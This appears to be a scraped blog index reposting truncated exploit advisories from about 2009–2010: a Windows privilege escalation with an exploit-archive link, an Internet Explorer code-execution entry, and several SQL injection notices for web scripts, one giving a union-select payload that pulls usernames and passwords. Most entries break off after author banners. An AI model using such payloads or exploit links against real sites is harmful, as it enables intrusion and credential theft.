Vulnerable InforMation And IT News

Source: http://www.securityfocus.com/bid/42269/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers.

Code:

http://www.exploit-db.com/sploits/Chimichurri-CVE-2010-2554.zip

[Read All About This Article]

# Title: Internet Explorer ‘winhlp32.exe’ ‘MsgBox()’ Remote Code Execution Vulnerability

# EDB-ID: 11615

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Maurycy Prodeus

# Published: 2010-03-02

# Verified: yes

# Download Exploit Code

# Download N/A

view sourceprint?Microsoft Internet Explorer is prone to a remote code execution vulnerability.

Source (iSEC Security

[Read All About This Article]

A DEMO FOR YOU! ENJOY IT.

http://lrv.bplaced.net/wmp/wmp.php

[Read All About This Article]

[+]
[+] SQL injection vulnerability
[+] PHP-IPNMonitor – sell digital downloads online
[+] Download : http://www.withinweb.com/phpipnmonitor/
[+] noname[at]antisecurity.org

[+] Bugs = index.php?maincat_id=

[+] exploit = -null+union+select+concat(username,0×3a,userpassword)+from+ipn_tblpasswords–

[+] Example
[+] :

[Read All About This Article]

=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th

[Read All About This Article]

[o] Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

–==[ Author ]==–
[+] Author : v3n0m
[+] Contact : v3n0m666[at]live[dot]com
[+] Blog : http://0wnage.wordpress.com/
[+] Group : YOGYACARDERLINK
[+] Site : http://yogyacarderlink.web.id/
[+] Date : September, 03rd 2009 [INDONESIA]
*************************************************************************
–==[ Details ]==–
[+]

[Read All About This Article]

An attacker can exploit this issue with a browser.

The following example URI is available:

http://www.example.com/wordpress/?cat=1.php/../searchform?

Vulnerable: WordPress WordPress 2.3.3
WordPress WordPress 2.3.2
WordPress WordPress 2.3.1
WordPress WordPress 2.2.3
WordPress WordPress 2.2.2
WordPress WordPress 2.2.1
WordPress WordPress 2.2.1
WordPress WordPress 2.1.3
WordPress WordPress 2.1.3
WordPress WordPress

[Read All About This Article]

============================================================
Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
============================================================

========================[Author]============================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]

[Read All About This Article]

(o)====================================================================(o)

-:- CBAuthority – ClickBank Affiliate Management SQL Injection Vulnerability -:-

Vendor : http://www.cbauthority.com/
Author : Angela Chang
Contact : angel@ch4ng.cc
Date : 17 august 2009

(o)====================================================================(o)

Dork :

[Read All About This Article]

~ Mtrb3 hena [Security-Code] ~

script :-> PHP Email Manager < Remote SQL Injection Vulnerability >

Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html

Dork:->PHPEmailManager

Found by :-> [ MuShTaQ ]

from :-> [WwW.SeC-CoDe.com]

C0ntact :a7m@mail.com
~ Exploit ~

File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]

Exploit:->

[Read All About This Article]